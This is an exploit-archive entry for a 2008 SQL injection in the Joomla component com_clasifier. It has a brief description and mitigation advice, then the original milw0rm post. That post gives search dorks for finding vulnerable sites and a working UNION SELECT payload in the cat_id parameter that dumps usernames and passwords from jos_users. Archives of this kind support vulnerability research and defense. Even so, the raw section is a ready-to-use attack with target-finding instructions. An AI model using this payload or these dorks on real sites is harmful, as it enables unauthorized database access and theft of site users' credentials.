joomla SQL Injection(com_clasifier)

vendor:

N/A

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

joomla SQL Injection(com_clasifier)

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The attacker can inject malicious SQL queries in the vulnerable parameter and gain access to the database. This can lead to unauthorized access to sensitive information such as usernames and passwords.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use the least privileged user account to access the database.

Source

Exploit-DB raw data:

###############################################################
#
# joomla SQL Injection(com_clasifier)
#
###############################################################
#
# AUTHOR : S@BUN
#
 HOME 1 : http://www.milw0rm.com/author/1334
#
# MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
################################################################
#
# DORK 1 : allinurl: com_clasifier
#
# DORK 2 : allinurl: com_clasifier cat_id
#
################################################################
EXPLOIT :

index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*


################################################################
# S@BUN             i AM NOT HACKER             S@BUN
################################################################

# milw0rm.com [2008-02-18]